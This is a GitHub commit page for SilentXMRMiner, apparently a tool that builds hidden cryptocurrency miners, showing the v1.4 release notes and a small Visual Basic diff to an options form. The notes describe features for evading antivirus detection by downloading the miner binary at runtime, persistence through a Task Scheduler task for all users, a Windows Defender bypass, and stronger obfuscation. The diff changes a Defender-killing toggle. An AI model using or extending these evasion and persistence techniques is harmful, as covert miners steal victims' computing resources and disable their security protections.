Skip to content
This repository has been archived by the owner on Sep 12, 2023. It is now read-only.

Commit

Permalink
Updated to v1.4
Browse files Browse the repository at this point in the history
v1.4 is the final update before the new, greatly improved unified miner that I'm working on.
* Added the Online Downloader option that makes the miner download the miner binary (from GitHub) during runtime to greatly decrease file size (to less then 100kb) and detections - Also added a cache so that it won't have to download the miner on every start
* Made the Task Scheduler task start for all users
* Improved Watchdog program flow
* Renamed "Kill" Windows Defender to Bypass Windows Defender to better represent the new functionality
* Improved obfuscation/encryption
* Improved overall code
  • Loading branch information
UnamSanctam committed Jul 4, 2021
1 parent 434320f commit 83eeba7
Show file tree
Hide file tree
Showing 17 changed files with 238 additions and 230 deletions.
128 changes: 65 additions & 63 deletions SilentXMRMiner/Advanced.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

1 change: 0 additions & 1 deletion SilentXMRMiner/Advanced.vb
Original file line number Diff line number Diff line change
Expand Up @@ -30,7 +30,6 @@
Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged
If toggleKillWD.Checked Then
toggleAdministrator.Checked = True
toggleUninstaller.Checked = True
End If
End Sub
End Class
Loading

0 comments on commit 83eeba7

Please sign in to comment.